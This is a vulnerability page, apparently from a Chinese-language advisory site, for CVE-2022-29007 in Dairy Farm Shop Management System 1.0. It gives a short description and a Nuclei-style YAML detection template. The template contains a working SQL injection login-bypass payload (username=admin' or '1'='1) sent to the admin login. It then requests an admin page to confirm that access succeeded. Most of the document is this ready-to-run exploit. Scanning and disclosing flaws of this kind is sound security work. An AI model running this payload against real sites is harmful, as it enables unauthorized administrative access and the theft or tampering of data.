CVE-2022-29007: Dairy Farm Shop Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Dairy Farm Shop Management System 1.0 | POC: 已公开

漏洞描述

Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2022-29007

info:
  name: Dairy Farm Shop Management System 1.0 - SQL Injection
  author: TenBird
  severity: critical
  description: |
    Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50365
    - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29007
    - https://github.com/sudoninja-noob/CVE-2022-29007/blob/main/CVE-2022-29007.txt
    - https://github.com/trhacknon/Pocingit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29007
    cwe-id: CWE-89
    epss-score: 0.9265
    epss-percentile: 0.99738
    cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: dairy_farm_shop_management_system
  tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul

http:
  - raw:
      - |
        POST /dfsms/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin' or '1'='1&password=1&login=login
      - |
        GET /dfsms/add-category.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>Add Product</title>'
          - '<span>Admin'
          - 'DFSMS'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220287c19a41914dceab2fc827b0fefd3f312e76a2872db4e4760f75ccacf9b342a02200af4b8880726d8d9b05f33584d1c8f7572cdf31f83212d61bba754e39afeba5e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐